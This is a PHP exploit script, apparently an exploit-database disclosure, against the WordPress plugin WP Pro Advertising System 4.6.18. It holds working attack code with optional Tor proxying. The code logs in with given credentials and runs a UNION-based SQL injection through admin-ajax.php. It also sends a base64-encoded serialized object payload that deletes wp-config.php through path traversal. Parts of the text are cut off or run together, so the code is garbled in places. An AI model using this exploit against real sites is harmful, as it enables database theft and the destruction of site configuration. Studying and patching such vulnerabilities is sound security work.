* Vendor Homepage: http://wordpress-advertising.com/ * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693 * Version: 4.6.18 * Tested on: Debian 8, PHP 5.6.17-3 * Type: SQLi, Unserialize, File Delete. * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:f:c:u:p:s:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ###\n"; echo "Setting TOR Proxy...\n"; $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address\n"; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()."\n"; echo "Are you sure you want to do this?\nType 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting!\n"); } echo "OK...\n"; } class CPDF_Adapter{ private $_image_cache; public function set_file($file){ $this->_image_cache = array($file); } } function logIn(){ global $curl, $options; file_put_contents('cookies.txt',"\n"); $curl->setCookieFile('cookies.txt'); $curl->get($options['t']); $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); $curl->post($options['t'].'/wp-login.php', $data); $status = $curl->getTransferInfo('http_code'); if ($status !== 302){ echo "Login probably failed, aborting...\n"; echo "Login response saved to login.html.\n"; die(); } file_put_contents('login.html',$curl->getResponse()); } function exploit(){ global $curl, $options; if ($options['m'] == 'd'){ echo "Delete mode\n"; $pay_load_obj = new CPDF_Adapter(); $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' ); $pay_load = base64_encode(serialize(array($pay_load_obj))); $data = array('stats_pdf'=>'1', 'data'=>$pay_load); $curl->post($options['t'].'?'.http_build_query($data)); $resp = $curl->getResponse(); echo $resp; } else { echo "SQLi mode \n"; echo "Trying a longin...\n"; logIn(); echo "Running SQL in Inject mode: ".$options['s']."\n"; $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load); $resp = $curl->getResponse(); //Grab the output if (preg_match('~

(.*?)(?: @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help."\n\n"; die(); }